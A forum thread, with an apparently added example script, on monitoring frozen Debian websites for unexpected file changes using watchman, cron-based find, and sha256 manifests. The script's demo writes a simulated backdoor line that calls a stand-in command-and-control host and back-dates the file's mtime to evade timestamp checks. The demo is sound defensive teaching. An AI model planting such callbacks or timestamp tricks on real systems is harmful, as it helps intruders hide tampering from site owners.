I have a server with two handfuls of sites that are “frozen” and will not change over the next few years. I am looking for a solution to monitor all directories under /home/$username/public_html/ for changes. Changes are not expected to happen, so each change could be a sign of a possible intrusion.
I can imagine several solutions for this. One would be a daily cronjob that creates a hash of the files or folders and compares it to yesterday’s hash. If there is a change, it sends an email to report that.
Or would inotifywait be able to do the task?
The thing is: I could try to create something like that. But I am far from being a bash monster. And I could imagine that something like that already exists, so that I do not have to reinvent the wheel.
Are you aware of anything that could achieve the targeted goal?
It’s for a Debian server, so any solution that might work for a Windows server will probably not work for me…
Thanks a lot in advance!
watchman by Facebook is very good for this purpose; if I remember correctly it uses inotify on Linux. It is production grade and comes with prebuilt features such as running a script when a file changes, logging the changes, etc.
# Add a new folder to watchman
watchman watch ./
# Remove a watched folder from watchman
watchman watch-del ./
# List all watched folders
watchman watch-list
# Add a trigger to the watched folder
watchman -- trigger ./ triggername -- ./trigger.sh
# Remove a trigger from the watched folder
watchman trigger-del ./ triggername
# List all triggers
watchman trigger-list ./
The commands assume you are watching the current working directory and that it contains a script named trigger.sh. The first parameter/argument passed to your script will contain the changed file name, which can be accessed using $1 in a bash script.
The documentation for watchman is quite bad; I will update this post if I made a mistake. For advanced usage please take a look here: Installation | Watchman
I used to use a simple cron one liner for something like that:
1 1 * * * root find /home/$username/public_html/ -mtime 0 | mail -s yoursubjecthere email@example.com
This is a very basic approach; it sends you a daily mail that is empty unless there are files that changed, which will then be listed in it…
It is probably easy to extend it a bit to only invoke mail if there are results, but I was too lazy.
PS: if it’s not a million files you could probably run find twice:
1 1 * * * root [ -z "$(find /home/$username/public_html/ -mtime 0 -print -quit)" ] || find /home/$username/public_html/ -mtime 0 | mail -s yoursubjecthere firstname.lastname@example.org
I haven’t tested that properly though…
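The question proposes a daily hash comparison and the cron answer above relies on file modification times. The following is an added example, not code from this thread or from any of the posters, contrasting the two on a throwaway directory tree: it takes a sha256 baseline, "backdoors" one file while restoring an old mtime, and then shows that a find based on timestamps reports nothing while the content-hash comparison flags the file. It assumes the GNU coreutils/findutils shipped with Debian (sha256sum, find -print0, sort -z, xargs -0, touch -t, mktemp); the paths, file contents and the simulated backdoor line are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread): content-hash baseline versus mtime-based
# find for detecting changes in a directory that is supposed to be frozen.
# Assumes GNU coreutils/findutils as on Debian.
set -u

# Write a sorted sha256 manifest of every regular file under $1 to stdout.
# Sorting makes two manifests of identical trees byte-for-byte equal.
make_manifest() {
    find "$1" -type f -print0 | sort -z | xargs -0 sha256sum
}

# Compare baseline manifest $1 with current manifest $2.
# Prints one sorted "added/removed/modified <path>" line per difference and
# nothing when the tree is unchanged. Paths must not contain whitespace
# (sha256sum's default output is "<hash>  <path>", split here on whitespace).
diff_manifests() {
    awk 'NR == FNR { base[$2] = $1; next }
         {
             if (!($2 in base)) print "added    " $2
             else if (base[$2] != $1) print "modified " $2
             delete base[$2]
         }
         END { for (p in base) print "removed  " p }' "$1" "$2" | sort
}

# Walkthrough on a constructed tree (not real site data). Sets MTIME_HITS
# (number of files the timestamp check reports) and HASH_REPORT (output of
# the hash comparison) so the result can be inspected afterwards.
demo() {
    work=$(mktemp -d)
    site=$work/public_html
    mkdir -p "$site"
    printf '<h1>frozen site</h1>\n' > "$site/index.html"
    printf 'console.log("ok");\n'   > "$site/app.js"

    make_manifest "$site" > "$work/baseline.sha256"   # day 1: trusted baseline
    touch "$work/last_run"                             # reference point for find -newer

    # Simulated intrusion: change the content, then back-date the mtime.
    # Anyone with write access to the file can do this with touch -t / touch -r.
    printf 'console.log("ok"); fetch("//evil.example/c2");\n' > "$site/app.js"
    touch -t 202001010000 "$site/app.js"

    # Timestamp-based check (the cron/find approach): the back-dated file is missed.
    MTIME_HITS=$(find "$site" -type f -newer "$work/last_run" | wc -l)

    # Content-hash check: catches it regardless of what the timestamps say.
    make_manifest "$site" > "$work/current.sha256"
    HASH_REPORT=$(diff_manifests "$work/baseline.sha256" "$work/current.sha256")

    rm -rf "$work"
}
```

For the real job, keep the baseline manifest outside the web root (ideally read-only or on another host: whoever can write public_html can also overwrite a baseline stored next to it), run `make_manifest` from cron, and only mail when `diff_manifests` prints something, e.g. `report=$(diff_manifests /var/lib/sitecheck/baseline.sha256 /tmp/current.sha256); [ -z "$report" ] || printf '%s\n' "$report" | mail -s "public_html changed" you@example.com`. Debian also packages purpose-built integrity checkers such as aide, which keep the same kind of hash database with more file attributes; inotify-based tools like the watchman answer above add real-time notification, but a daily hash compare is a cheap backstop that does not depend on the watcher having been running at the moment of the change.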
Not really neat, but something I can think of is:
dirc=$(find Desktop -name '*litespeed*'); if [ -n "$dirc" ]; then printf '%s\n' "$dirc" | mail -s yoursubjecthere email@example.com; fi
Though I would prefer using a Slack webhook or something to make sure it actually reaches me.
Excellent! Thank you so much, guys! Those are great starting points for me and will help a lot!